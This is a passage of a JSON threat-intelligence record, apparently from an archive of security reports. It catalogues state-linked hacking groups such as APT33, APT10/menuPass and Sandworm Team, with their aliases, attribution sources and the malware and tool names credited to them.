				"SigLoader",
				"SinoChopper",
				"SodaMaster",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Trochilus RAT",
				"UpperCut",
				"Vidgrab",
				"WinRAR",
				"WmiExec",
				"Wmonder",
				"Xamtrav",
				"Yggdrasil",
				"Zlib",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"dfls",
				"lena",
				"nbtscan",
				"pivy",
				"poisonivy",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b23e717c-0b27-47e0-b3c8-4defe6dd857f",
			"created_at": "2023-01-06T13:46:38.367369Z",
			"updated_at": "2026-04-10T02:00:02.945356Z",
			"deleted_at": null,
			"main_name": "APT33",
			"aliases": [
				"Elfin",
				"MAGNALLIUM",
				"HOLMIUM",
				"COBALT TRINITY",
				"G0064",
				"ATK35",
				"Peach Sandstorm",
				"TA451",
				"APT 33",
				"Refined Kitten"
			],
			"source_name": "MISPGALAXY:APT33",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ba3fff0c-3ba0-4855-9eeb-1af9ee18136a",
			"created_at": "2022-10-25T15:50:23.298889Z",
			"updated_at": "2026-04-10T02:00:05.316886Z",
			"deleted_at": null,
			"main_name": "menuPass",
			"aliases": [
				"menuPass",
				"POTASSIUM",
				"Stone Panda",
				"APT10",
				"Red Apollo",
				"CVNX",
				"HOGFISH",
				"BRONZE RIVERSIDE"
			],
			"source_name": "MITRE:menuPass",
			"tools": [
				"certutil",
				"FYAnti",
				"UPPERCUT",
				"SNUGRIDE",
				"P8RAT",
				"RedLeaves",
				"SodaMaster",
				"pwdump",
				"Mimikatz",
				"PlugX",
				"PowerSploit",
				"ChChes",
				"cmd",
				"QuasarRAT",
				"AdFind",
				"Cobalt Strike",
				"PoisonIvy",
				"EvilGrab",
				"esentutl",
				"Impacket",
				"Ecipekac",
				"PsExec",
				"HUI Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2b29dd16-a06f-4830-81a1-365443bc54b8",
			"created_at": "2023-01-06T13:46:38.460047Z",
			"updated_at": "2026-04-10T02:00:02.983931Z",
			"deleted_at": null,
			"main_name": "QUILTED TIGER",
			"aliases": [
				"Chinastrats",
				"Sarit",
				"APT-C-09",
				"ZINC EMERSON",
				"ATK11",
				"G0040",
				"Orange Athos",
				"Thirsty Gemini",
				"Dropping Elephant"
			],
			"source_name": "MISPGALAXY:QUILTED TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434713,
	"ts_updated_at": 1775792229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/89f7fb7b421848e7da6961809778cbdb65fd8a58.pdf",
		"text": "https://archive.orkl.eu/89f7fb7b421848e7da6961809778cbdb65fd8a58.txt",
		"img": "https://archive.orkl.eu/89f7fb7b421848e7da6961809778cbdb65fd8a58.jpg"
	}
}